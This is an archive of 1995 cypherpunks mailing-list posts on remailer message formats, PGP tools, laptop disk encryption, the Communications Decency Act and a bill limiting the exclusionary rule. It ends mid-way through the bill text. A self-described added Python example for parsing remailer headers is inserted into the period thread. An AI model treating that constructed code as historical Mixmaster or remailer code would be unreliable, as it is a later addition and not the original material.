lcottrell@popmail.ucsd.edu (Lance Cottrell) writes:
>With Mixmaster, everything is hidden inside the encrypted and ascii armored
>message structure.
 
>I use the :: token to let the remailer know that this is a remailer message
>of some sort. The Remailer-Type will eventually be used to indicate the
>version that created the message. It would be easy to add support for MIME.
>It would just replace the token and version number.
 
>All remailing instructions are inside the ascii armor.
>Note that the block of ascii armor is always exactly the same length.
 
>::
>Remailer-Type: 2.0
 
>-----BEGIN REMAILER MESSAGE-----
>hQCMAgbmF1BLzawNAQP/RFw2/UagugMFPlnJ94KLmhaxDoplzAhNBCxuFRL2fosL
>V1YnFd2XVckJJ6vTe6DB+POO+V7HEdXkp3sWtjb56Am+/B+tM1TdeC6NPNV4g5PC
>[...]

Ah, I see how you are doing it.  Having re-read your docs, I gather
that when un-armored the file is in an encrypted binary format, and
when decrypted at least the non-header portion of the file is still
binary?  I think this is a good way to do it; it addresses the point
Eric made recently about size expansion when an armored file is
encrypted at each step.

The one thing I would mention is that "::" was not originally intended
as an indication that the message was to be remailed.  Rather, this was
simply a "header pasting token" which could be used to move a few lines
from the body up into the header for those people who can't set header
fields on outgoing mail.  Then the presence of "Anon-To:" or whatever
in the header is what actually causes the action.  So you don't need to
use "::", you can just set your headers directly and get the same
effect.  (This is not to say you need to do it like this, just that
that is how the original design that Eric created worked.)
 
If you did want to follow this model, you could think about using a
MIME header to indicate the type of the message contents rather than
the "::".  Another alternative would be to use a different special
field in the mail header, like perhaps your "Remailer-Type: 2.0", but
I'm not sure that a new top-level header field is the right place for
this.  It looks to me like most of the standard headers deal more with
moving the message around rather than with telling what would be done
with it on receipt.  It's kind of a fine line but it looks to me like
more of a job for a MIME content type since that is really what it is
for.  You could use something like:
 
MIME-Version: 1.0
Content-Type: application/remail; version="2.0"

or

MIME-Version: 1.0
Content-Type: application/remail-mark-2
 
Then the rest of the message could look just as you have it.  Or, to use
a little more of the existing standard, you could add:
 
Content-Transfer-Encoding: base64
 
and take out your BEGIN and END lines since it looks like you are using
base64, although the augmented kind that PGP uses with the CRC at the
end; you'd have to lose the CRC in that case.  (I wonder if PGP will do
that in the MIME-PGP integration draft that is supposedly being worked
on.)

One question is, how do you actually send your messages in the
mixmaster client and servers?  Do you go directly to sendmail, or do
you use a user agent like /bin/mail?  If the former then it doesn't
seem like it would be too hard to add these header fields.  On the
receiving end then hopefully also it would not be much harder to match
the Content-Type: string than the one you are using.

The advantage, again, is that to a considerable extent this kind of
application is exactly what MIME was planning for with the "application"
content-type.  This lets you mark the contents of the message in a
standard way.  And you are already using something very close to the
base64 encoding that MIME specifies.  So this does seem like a good
opportunity to go with the internet mainstream by following this
standard.  If this seems like something you want to do I'm sure our MIME
experts here can tell how to define a new content type.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzpMORnMLJtOy9MBAQHWTwIA5k+6zO6/mMagKrNZELu7gHO2USlPnVGI
+SnIaj1jGtkzaodyIaEiUptAB4v5xfX8Lg7f+lcGzJYcEGrIi3+UPQ==
=NK01
-----END PGP SIGNATURE-----
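
The two ways of marking a remailer message discussed in the message above ("::" header pasting with Remailer-Type, and a MIME application content type with base64 transfer encoding), recognised on the receiving end. This is an added example, not Mixmaster's or any remailer's code; the END marker text, the allowlist of pasteable headers, the function names and the sample messages are assumptions or constructed.

```python
import base64
import binascii
import email

# Assumed allowlist: only these fields may be pasted from the body into the header.
PASTEABLE = {"remailer-type", "anon-to", "mime-version",
             "content-type", "content-transfer-encoding"}
BEGIN = "-----BEGIN REMAILER MESSAGE-----"
END = "-----END REMAILER MESSAGE-----"     # assumed counterpart of BEGIN


def paste_headers(msg):
    """'::' header pasting: move the lines that follow '::' up into the header."""
    if msg.is_multipart():
        raise ValueError("multipart messages are not handled")
    lines = msg.get_payload().splitlines()
    i = 0
    while i < len(lines) and not lines[i].strip():
        i += 1
    if i == len(lines) or lines[i].strip() != "::":
        return msg                                   # nothing to paste
    i += 1
    while i < len(lines) and lines[i].strip():
        name, sep, value = lines[i].partition(":")
        name = name.strip()
        if not sep or name.lower() not in PASTEABLE:
            raise ValueError("refusing to paste header line: %r" % lines[i])
        del msg[name]                                # pasted value replaces any original
        msg[name] = value.strip()
        i += 1
    while i < len(lines) and not lines[i].strip():
        i += 1
    msg.set_payload("\n".join(lines[i:]))
    return msg


def _decode(b64_lines):
    data = "".join(line.strip() for line in b64_lines)
    try:
        return base64.b64decode(data, validate=True)
    except binascii.Error as exc:
        raise ValueError("payload is not valid base64") from exc


def classify(raw):
    """Return (kind, version, payload_bytes); raise ValueError if malformed."""
    msg = paste_headers(email.message_from_string(raw))
    body = [line for line in msg.get_payload().splitlines() if line.strip()]
    ctype = msg.get_content_type()
    if ctype == "application/remail" or ctype.startswith("application/remail-mark-"):
        cte = (msg.get("Content-Transfer-Encoding") or "").strip().lower()
        if cte != "base64":
            raise ValueError("remailer content must be base64 encoded")
        version = msg.get_param("version") or ctype.rsplit("-", 1)[1]
        return ("mime", version, _decode(body))
    if msg.get("Remailer-Type"):
        if BEGIN not in body or END not in body:
            raise ValueError("armor markers missing")
        armor = body[body.index(BEGIN) + 1:body.index(END)]
        armor = [l for l in armor if not l.startswith("=")]   # drop PGP-style CRC line
        return ("legacy", msg["Remailer-Type"].strip(), _decode(armor))
    return ("not-remailer", None, b"")


# Constructed sample messages (addresses and payload are placeholders).
_B64 = base64.b64encode(b"constructed payload").decode()
LEGACY_SAMPLE = ("To: remailer@example.invalid\n\n::\nRemailer-Type: 2.0\n\n"
                 + BEGIN + "\n" + _B64 + "\n=AAAA\n" + END + "\n")
MIME_SAMPLE = ("To: remailer@example.invalid\nMIME-Version: 1.0\n"
               'Content-Type: application/remail; version="2.0"\n'
               "Content-Transfer-Encoding: base64\n\n" + _B64 + "\n")
PASTED_MIME_SAMPLE = ("To: remailer@example.invalid\n\n::\nMIME-Version: 1.0\n"
                      "Content-Type: application/remail-mark-2\n"
                      "Content-Transfer-Encoding: base64\n\n" + _B64 + "\n")
```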




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 06:09:13 PST
Subject: Re: S314 and potential hell-raising
In-Reply-To: <199502090715.XAA14870@alkahest.isas.com>
Message-ID: <Pine.LNX.3.91.950209090919.8172C-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, joshua geller wrote:

> there's room for another organization I think. there are, in my opinion,
> two reasons why the NRA is as effective as it is: it has a single issue
> that it concerns itself with and it never compromises.
> 
> so what, in very few words and as clearly as possible, is our issue?

I don't know what your issue is, but a small group of people are at the 
moment formulating the beginnings of a new "group" of sorts with a very 
specific agenda in mind.

Which is an utterly obscure and non-descriptive thing to say. But hold 
on. We should have an initial announcement ready, I hope, shortly.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Thu, 9 Feb 95 09:33:50 PST
To: cypherpunks@toad.com
Subject: My pgp emacs code in ftp://ftp.markv.com/pub/jpp/pgpelisp/*
Message-ID: <9502090927.aa02278@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


  I have been hacking yet another emacs to pgp interface for some time
now.  I am happy with the current state of affairs, and am releasing
it for general consumption.  It supports automatic decrypting,
signing, signature checks and interfaces nicely with rmail.el and
sendmail.el.

  Also it includes a set of remailer functions which parse the ping
reports from Raph Levien <raph@CS.Berkeley.EDU> and give you a simple
interface to chaining a bunch of remailers together.

  The code is license free; use it, sell it, hack it up, export it,
claim it is yours, I don't care.  Feel free.  (How could I stop you
any way?  I suspect that number theory, and complexity theory *are*
the real natural rights.)

  My code is in ftp://ftp.markv.com/pub/jpp/pgpelisp/*

  It is not yet very well packaged.  Read 2b.emacs.  I still want to
clean up the remailer stuff a little before I spend time packaging.
(C-C commands, reply block building, and estimates of a chain's
reliability, (support for ghio and julf {pseudo, ano}nyms?))

  Unfortunately my net connection, and means of support here at markv
will likely soon be gone :(...  This may be the last chance I have to
distribute or work on this code for a while.  If the code impresses you
with my ability to hack, you might want to make me a job offer :) Or
point me to jobs.  OTOH, if my ability to hack doesn't impress you,
please be quiet until I do get another job :).

j'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Thu, 9 Feb 95 07:37:05 PST
To: cypherpunks@toad.com
Subject: Re: Best encryption device driver for MS-DOS?
Message-ID: <199502091537.JAA13636@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


>> You leave your laptop turned on and out of your immediate reach? Geesh.
>> I would NEVER leave my laptop anywhere that I didn't have it in eyeshot. It
>> was the whole reason I got one.
>
>Well, it's rather tacky to turn off the laptop, unplug it, etc., just to
>lug it into a boardroom.  Not impressive.
>
>> > As you might imagine, I have a full suite of programming tools on the laptop,
>> > including MS Office Pro and VB Pro, both of which are worth about $500
>> > apiece - I'd sure hate to lose them to a malicious cracker, or someone who
>> > would like a personal copy of my source code for their own use, or who just
>> > wants to "borrow" my secret key for awhile.
>> >
>> Business must be good, you are more worried about somebody stealing a $500
>> dollar program than a several thousand dollar laptop?
>
>Oh, I'm not worried about the laptop walking off, I'm worried about the
>software I've written walking off...
>

How about an obvious solution, like the password feature on After Dark?  If
I remember correctly, there's a hot-key combination you can use to bring up
the screen saver mode immediately as you get up from the machine.  It's
obviously not foolproof, but just blanking the screen and going into a
password mode would probably deter the casual browser.  If you're really
worried, change your autoexec so it goes into windows and starts AD immediately.

Low tech, maybe, but easy!

        Pat






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 9 Feb 95 09:52:02 PST
To: jpp@markv.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502072124.aa20836@hermix.markv.com>
Message-ID: <Pine.SUN.3.91.950209092021.25204A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

THIS IS A GRAMMAR FLAME.  Delete now if you don't like that sort
of thing.

Recently, several folks on this list have posted `letters to the
editor' or `letters to their representatives' that they had 
already sent or intended to send.  While most stated their case
clearly and dramatically, much of their impact was lost due to
grammar and spelling errors.  If your purpose is to persuade, 
don't shoot yourself in the foot by writing like an illiterate.

I know, I know, Net dwellers fancy themselves `above' such 
pedestrian nit picking.  The truth is, though, those who you 
intend to persuade will judge your intellect by these standards 
as much as by your content.  And in a way, they are right.  If 
you are too sloppy or lazy to write correct English, how unlikely 
is it that your thinking is equally sloppy and lazy?

In previous postings I have kept my comments to private e-mail.
I apologize to J Prime for going off on him publicly, but (a) it 
had to be someone, and (b) his posting is particularly egregious
in this regard.  (I did like *what* he said, just now *how* he
said it.)

Among ourselves, we can be less formal, but when we go public, I
think we would be a lot more effective if we had more respect for
the technical aspects of our prose.


 S a n d y

P.S.  I hope I didn't misplace any modifiers or misspell 
      anything in this post.  But if I did, please do as I
      say, not as I do.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 06:54:08 PST
To: strick@techwood.org
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502081902.LAA01787@gwarn.versant.com>
Message-ID: <199502091453.JAA26458@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


[ .. ]

No disagreements with your reply. Of course the first amendment (or the rest
of the Bill of Rights) has stopped legislators from passing restrictive laws.

The line between indecency and obscenity is vague. Legal defense fees are
not... nor are opportunistic prosecutors-- which is a real problem. Look at
what happened to Jello Biafra and the Dead Kennedys if you'd like an
example. I've heard that there were recently busts in Florida of some BBS
systems that carried the alt.sex* groups while universities in the area which
also carried them weren't touched.


The "safe harbor" is 10pm, but many radio stations (like WUSB here in Stony
Brook, where I do some radio programming) use midnight as a safe time and
give periodic warnings during shows if any indecent material is aired.

Problems with these vague and-or unenforceable "decency" laws is that they
allow for selective enforcement which is often motivated more by politics
and personal greed than by their alleged concerns for decency.

> 
> In the U. S., you have a first amendment right to indecent speech.
> 
> The question of a late-night "safe harbor" for indecent speech on the
> air is about when children are likely to be listening.  First
> amendment rights apparently don't apply to children who are listening
> to the radio.  
> 
> Right now there is a "safe harbor" from around 10pm (or is it 9pm?)
> thru 6am, but this changes regularly, usually as a result of "case law"
> (someone being prosecuted under next month's rules, not this month's)
> 
> 				strick
> 

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 06:58:53 PST
To: cme@tis.com (Carl Ellison)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502082149.AA28226@tis.com>
Message-ID: <199502091458.JAA26730@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> >Date: Tue, 7 Feb 95 21:24:01 PST
> >From: jpp@markv.com
> 
> >of the very most important rights.  To hold the owner of a bulletin
> >board responsible for the illegal messages posted to it, is to force
> >the bulletin board owner to become a government censor in all but name
> >(and wages).
> 
> anyone heard of "no unfunded mandates" ?

It's not a mandate. It's an order from god. (As if you didn't know, it
says in the bible that the Republican party is his official mouthpiece.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 9 Feb 95 06:58:55 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: MIME based remailing commands
In-Reply-To: <199502090425.UAA24521@largo.remailer.net>
Message-ID: <9502091458.AA11554@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    xpat@vm1.spcs.umn.edu says:
>    > IMHO, an ideal message would have the ability to handle nested objects
>    > of varying types, MIME is only a start.
> 
>    What is it precisely that you might want to encapsulate that MIME
>    can't encapsulate?
> 
> Perry, you're missing the whole point, just like the exchange a few
> days about a remailer format standard.

If I am missing the whole point, it is because people are being
extremely vague about stating the point. This is engineering, not
social science. One specifies things precisely, as in "I think MIME
can't specify how to encapsulate a sound file", or "I think MIME
doesn't have the right headers defined to specify how long a mail
message is to be delayed". This fuzzy-engineering might feel good to
some of you but from my perspective it does nothing to enhance the
information content of the discussion.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 07:02:48 PST
To: samman@CS.YALE.EDU (Ben)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <199502091502.KAA27022@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 8 Feb 1995, root wrote:
> 
> > Hi all,
> > 
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegally if they 'believed'
> > that it was collected in good faith.
> 
> This sounds like a spoof.  Look at the number.

I heard yesterday that someone in the House of Representatives proposed an
amendment to the new crime bill which was soundly defeated. Turns out the
Amendment was worded exactly as the Fourth Amendment in the Bill 'o Rights.
Apparently many a congressman/woman has egg on their face...
> 
> Ben.
> 
> 
Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 9 Feb 95 02:12:00 PST
To: ethridge@netcom.com
Subject: Re: The drumbeat against anonymity continues....
Message-ID: <9502091009.AA03503@pero>
MIME-Version: 1.0
Content-Type: text/plain


Allen B. Ethridge wrote:

> The technology to reduce cellular fraud, through encryption and
> authentication, is easily implementable, but for some reason neither
> the operating companies nor the manufacturers want it.
> 
> In contrast, European cellular (GSM) products do implement
> encryption and authentication (at least as far as laws allow).
> GSM mobile phones can be equipped with a slot for a card that
> identifies the subscriber.  Billing is based on the subscriber's
> identity, not the phone's.

Actually, all GSM phones use a smart card to ID the subscriber.
There was at one point the idea that this card would be useful
for other things, e.g. you could plug it into a fixed line
phone and have that phone take on your personal number, or even
use it as a payment card. However, the desire for ever smaller
phones means that the credit card form factor is dying out for SIM
cards, and one doesn't want to keep popping a 0.5" x 1" mini-SIM
out of the bowels of the phone.

GSM uses less than strong encryption, by the way. I forget the
technical details, but it is of the level that governments can
fairly readily crack, but beyond the reach of most private
organisations. (So no more 'Squidgy-gate'). It would, however,
be quite feasible to add additional second stage encryption
to phones (since the dataflow is digital point-point). I wonder
if Nokia, a Finnish company well outside the scope of COCOM,
might offer a feature like this.

Incidentally, is there likely to be any adoption of GSM
in the US in the near future?

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Thu, 9 Feb 95 07:10:31 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502091502.KAA27022@libws4.ic.sunysb.edu>
Message-ID: <Pine.SUN.3.91.950209100901.12976A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> > On Wed, 8 Feb 1995, root wrote:
> > 
> > > Hi all,
> > > 
> > > A friend advises me that today House Bill 666 passed. This supposedly would
> > > allow police officers to use evidence collected illegally if they 'believed'
> > > that it was collected in good faith.
> > 
> > This sounds like a spoof.  Look at the number.

I regret that my previous hope was dead wrong.

There's a front page story on it in today's NYT.  Hopefully for those of 
you that are NYT challenged, maybe John Young will make it available as 
per his usual gracious self.

Shit!

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:49:22 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain



In article <199502090413.UAA24481@largo.remailer.net>, eric@remailer.net writes:
>    From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
> 
>    You are right here. However, our observation is that an interesting
>    chunk of the world is moving towards using X.509 based certificate
>    infrastructures for many things.
> 
> It's that interesting chunk that RSADSI is pointing out to you.  When
> you see the world through the eyes of a vendor ...

Actually we are getting strong interest from almost everybody but RSA.
I imagine that RSA may have some plans in this area, but what they are
is unknown to me.

> And you know, of course, that PEM really stands for Patent Extension
> Mechanism.

Har! Besides the certificate problems, are there other problems with
PEM that have prevented its adoption?

> I don't really blame you much.  I mean TIPEM handles all the X.509
> stuff just fine and PGP can't get out even the simplest of libraries,
> or even a partial library.

Our implementation supports this X.509 stuff as well. We don't have a
DUA yet though...

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Thu, 9 Feb 95 08:06:21 PST
To: cypherpunks@toad.com
Subject: Re: Cooperation
In-Reply-To: <9502071321.AA19736@cfdevx1.lehman.com>
Message-ID: <fbZElKJXYHRU078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain



I would think that MIME support would be extremely important to some
of the overall goals of the remailer net, i.e. popularity and off-shore
remailers.  Now, I'm not that familiar with MIME, but I believe it
has much better support (that is, it has some) for the extended character
sets that are needed for many languages.

The remailers as they stand today, are great as long as you don't want
to send a message in Chinese, Russian, etc.

As far as RFCs, I think documenting the current remailer system then
the new version is a good idea.  The current system can be done now,
done faster, and provide a better understanding for others who can
then add to the discussion for the next version.

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 07:52:27 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502091453.JAA26458@libws4.ic.sunysb.edu>
Message-ID: <Pine.LNX.3.91.950209105014.8284B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> The line between indecency and obscenity is vague. Legal defense fees are
> not... nor are opportunistic prosecutors-- which is a real problem. Look at
> what happened to Jello Biafra and the Dead Kennedys if you'd like an
> example. I've heard that there were recently busts in Florida of some BBS
> systems that carried the alt.sex* groups while universities in the area which
> also carried them weren't touched.

This is part of the danger. It to some degree doesn't matter how 
restrictive or "enforceable" the law might be, or even whether or not 
prosecutions will stick. Arrests and prosecutions will take a financial 
toll on those targeted, and will create a chilling effect in the online 
community, meaning sysops and BBS operators will start policing 
themselves too severely in an effort to avoid political or legal scrutiny.

> The "safe harbor" is 10pm, but many radio stations (like WUSB here in Stony
> Brook, where I do some radio programming) use midnight as a safe time and
> give periodic warnings during shows if any indecent material is aired.

Unfortunately, this only works for media which operate within the old 
broadcast paradigm, while the online world operates within the network 
paradigm. There are no hours in which it is safe to broadcast because 
there is no "broadcast" in the traditional sense.

> Problems with these vague and-or unenforceable "decency" laws is that they
> allow for selective enforcement which is often motivated more by politics
> and personal greed than by their alleged concerns for decency.

And is also, as stated above, often motivated out of a desire to force 
the public to overly-police themselves to avoid prosecution.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Thu, 9 Feb 95 10:58:57 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SUN.3.91.950209092021.25204A-100000@crl.crl.com>
Message-ID: <9502091057.aa19104@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy, and other C'punks,

THIS IS A RESPONSE TO A GRAMMAR FLAME.  But not, I hope, a flame
itself.

I respect your opinion, Sandy, and am glad you like what I wrote.  And I
certainly don't take your grammar 'flame' personally.  In fact, I
_agree_ with what you have said.  But for one thing -- one of my
points was to rub their noses in a particularly stinky example of
steganography.  What secret messages are concealed in my letter?  Can
anyone know?  That was an essential point to my letter.

In retrospect I would change the analogy from parking lots to mail
carriers.  (Does it make sense for a mail carrier to be held liable
for the 'bad' mail they happen to deliver?)  I would also probably
point out that the internet community standard for what is obscene is
awfully loose, and seems to focus mainly on a brand of pork meat
product. ;)

I just got off the phone with my 'representatives.'  Perhaps calling
them doesn't have the same impact that a letter does, but it is very
immediately gratifying.

j(who _can_ drive a spelling checker)'

P.S.  Yes, you made an error in your post :).  If you will proof my
letters to my reps I will proof yours.  Deal?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 07:59:22 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502091502.KAA27022@libws4.ic.sunysb.edu>
Message-ID: <Pine.LNX.3.91.950209105922.8309A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> I heard yesterday that someone in the House of Representatives proposed an
> amendment to the new crime bill which was soundly defeated. Turns out the
> Amendment was worded exactly as the Fourth Amendment in the Bill 'o Rights.
> Apparently many a congressman/woman has egg on their face...

Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
text of the 4th Amendment without attributing it to be such. It was 
defeated. Dems then immediately took to the floor of the House accusing 
the Repubs of trying to dismantle the Constitution.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Thu, 9 Feb 95 08:15:31 PST
To: samman@CS.YALE.EDU (Ben)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <9502091615.AA13172@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ben originally said the following...
> 
> On Wed, 8 Feb 1995, root wrote:
> 
> > Hi all,
> > 
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegally if they 'believed'
> > that it was collected in good faith.
> 
> This sounds like a spoof.  Look at the number.

Nope... wish it was... but I saw it pass on C-SPAN.  Boy was I
pissed.
Looks like it's time to make a 2048 bit PGP key.  *8)


-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Thu, 9 Feb 95 08:40:50 PST
To: ecarp@netcom.com
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <m0rcYxl-0004IOC@s116.slcslip.indirect.com>
Message-ID: <9502091640.AA16231@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp [khijol Sysadmin] originally said the following...

> apiece - I'd sure hate to lose them to a malicious cracker, or someone who
> would like a personal copy of my source code for their own use, or who just
> wants to "borrow" my secret key for awhile.

"Is that a PGP key in your pocket or are you just happy to see
me?" :)

The best way I can think of to protect your secret key is to
store it off of your laptop.  Put it on a floppy disk or a
PCMCIA card and keep the sucker in your pocket or in a safe.

> What do people recommend as the solution for this?  Some sort of IDEA-based
> or triple-DES-based device driver would seem to be the answer to this, but
> I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
> one to use.  I like the sound of Michael Sattler's encryption driver for the
> Mac, but alas, I'm running MS-DOS :(

There's a program for DOS called SecureDrive (I think) that
uses IDEA encryption to protect hard drives.
Only problem you'll have is you'll have to repartition your
hard drive.  This is because the bootable partition needs to be
unencrypted.

What I'd set up is a small partition that's bootable and has a
version of DOS installed on it.  Then I would keep all the
software/data you want to protect on the much larger encrypted
partition.

Another thing I'd note is that while it works great with
uncompressed hard drives and floppies, I'm not certain that it
would work or work safely with compressed drives.  I haven't
tried it yet.

I'm at my school's computer lab so I can't dig up a copy of it
yet (or remember where the FTP site I got it from) but if you
want I'll try to track it down for you (if it hasn't been
posted here already).
-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 9 Feb 95 08:49:37 PST
To: cypherpunks@toad.com
Subject: Senate Version of HR666 (fwd)
Message-ID: <Pine.SOL.3.90.950209114334.2474A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


It is still *theoretically* possible to stop the legislative
revocation of the 4th amendment, if you believe we have a 
representative government.

Brad D.

---------- Forwarded message ----------
Date: 9 Feb 1995 11:14:58 U
From: Cooley Stephen <cooley_stephen@space.honeywell.com>
To: UWSA <uwsa@shell.portal.com>, baron_mark_a@smtpmm.space.honeywell.com,
    Bostock#m#_Craig_W.FL40-P02@smtpmm.space.honeywell.com,
    Kidd_Lee.FL51-P03@smtpmm.space.honeywell.com
Subject: Senate Version of HR666

S54 - the Senate version of HR666 subverts the 4th Amendment!

   I called Sen Mack's (R-FL) DC office this morning for info on S54.  This
bill has been submitted to the Senate Judiciary Committee for consideration.
Hearings for S3-The "New" Crime bill, are scheduled for Fed 15th.  The new
crime bill also has an Exclusionary Evidence section too.  I have appended this
section after S54 below.  No hearings for S54 are scheduled as of yet.  The
aide I talked to didn't know if any hearings on S54 would even occur before it
is passed onto the floor for a vote.  The committee could mark up the bill and
pass it on without hearings.

  Please pass this info onto other groups and reflectors.  We have to get the
word out on this bill. S54 modifies the requirements of the 4th amendment to

          ".....if the search or seizure was undertaken in an objectively 
          reasonable belief that it was in conformity with the fourth
          amendment."

Given the court rulings allowing traffic stops and searches due to an officer's
discretion, "probable cause", S54 hammers another nail into the 4th Amendment
coffin.  Call your Senators and let them know your thoughts on this bill. 
There is no time to waste.

FILE s54.is
          S 54 IS
          104th CONGRESS
          1st Session

          To amend title 18 to limit the application of the exclusionary rule.

                           IN THE SENATE OF THE UNITED STATES
                                     January 4, 1995

          Mr. Thurmond introduced the following bill; which was read twice 
              and referred to the Committee on the Judiciary

                                         A BILL

          To amend title 18 to limit the application of the exclusionary rule.

            Be it enacted by the Senate and House of Representatives of the
          United States of America in Congress assembled, That this Act may 
          be cited as the `Exclusionary Rule Limitation Act of 1995'.

            Sec. 2. (a) Chapter 223 of title 18, United States Code, is
          amended by adding the following two sections:

          `Sec. 3508. Limitation of the fourth amendment exclusionary rule
            `Evidence which is obtained as a result of a search or seizure
          shall not be excluded in a proceeding in a court of the United
          States on the ground that the search or seizure was in violation
          of the fourth amendment to the Constitution of the United States,
          if the search or seizure was undertaken in an objectively 
          reasonable belief that it was in conformity with the fourth
          amendment. A showing that evidence was obtained pursuant to and
          within the scope of a warrant constitutes prima facie evidence of
